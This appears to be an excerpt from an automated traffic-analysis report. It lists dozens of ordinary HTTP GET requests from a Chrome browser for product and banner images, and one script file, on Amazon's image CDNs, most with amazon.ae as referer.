    Source: global trafficHTTP traffic detected: GET /images/I/61lJW9LVKqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/611TWGHXWyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61BpJ-+2UGL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41iU2dw4mWL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51dMriM2HlL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924059_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_OHL_Lunchboxeswaterbottles_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61gfdNg8jyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71F1yxjGeYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/614eD8BhoUL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71L9xtDPoLL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_laptops_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_Stationairy_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_SL_Backpaksshoesclothing_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_PCaccessories_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH082_AE_BTS24_GW_bubbler_GL_Dealsonbooks_400x400_EN._CB565231256_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-Modified-Since: Tue, 11 Jan 2022 14:48:33 GMT
    Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31R49MniA9L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Grocery_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619DPgbhX5L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41iXOCSvWNL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71GWDQsQzaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51YIzqZ2R5L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71YXfRqyg3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/618LrXHTM3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_OHL_Lunchboxeswaterbottles_400x400_EN._CB567012733_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81-cKwx9+lL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71qrtZlAzuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61r-8obHj2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61kj0CBNocL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
